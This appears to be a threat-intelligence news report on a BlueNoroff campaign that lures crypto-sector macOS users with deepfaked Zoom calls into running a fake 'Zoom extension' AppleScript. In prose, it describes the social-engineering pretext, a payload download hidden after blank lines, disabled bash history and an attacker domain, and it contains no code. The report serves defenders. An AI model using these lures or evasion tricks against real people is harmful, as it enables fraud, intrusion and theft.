The North Korean-linked BlueNoroff group, also known as Sapphire Sleet or TA444, has launched a sophisticated social engineering campaign targeting employees in the cryptocurrency sector, specifically those using macOS devices. This latest attack leverages deepfake technology and fake Zoom meetings to deliver backdoor malware.
Attack Chain Breakdown
The attack begins with a message sent via Telegram from an external contact to a crypto foundation employee, requesting a meeting. The attacker provides a Calendly link for scheduling, which is disguised as a Google Meet invite but actually redirects to a fake Zoom domain under the attacker’s control.
After several weeks, the victim joins a group Zoom call that features deepfaked video representations of known company executives and other external contacts. During the meeting, the victim is told their microphone isn’t working. The deepfaked personas urge them to download a “Zoom extension” to fix the issue.
Malware Delivery
The extension link, sent via Telegram, delivers an AppleScript file named zoom_sdk_support.scpt. The script opens a legitimate Zoom SDK webpage to appear authentic but, after thousands of blank lines, downloads a second-stage payload from a malicious domain controlled by the attackers (support.us05web-zoom.biz). The script disables bash history logging, checks for and installs Rosetta 2 (to ensure compatibility with x86_64 payloads on Apple Silicon Macs), and then downloads and executes further malware, hiding its activities from the user.
Technical Details and Capabilities
• The malware is designed to evade detection and maintain persistence on macOS, even bypassing some of Apple’s newer security features.
• Once installed, it allows remote shell access and command execution, giving attackers full control over the compromised system.
• The final payload is capable of exfiltrating sensitive data and is believed to be aimed at cryptocurrency theft, consistent with BlueNoroff’s history.
BlueNoroff’s focus on macOS users in the crypto sector demonstrates a shift from traditional Windows-based attacks and shows the group’s evolving tactics.
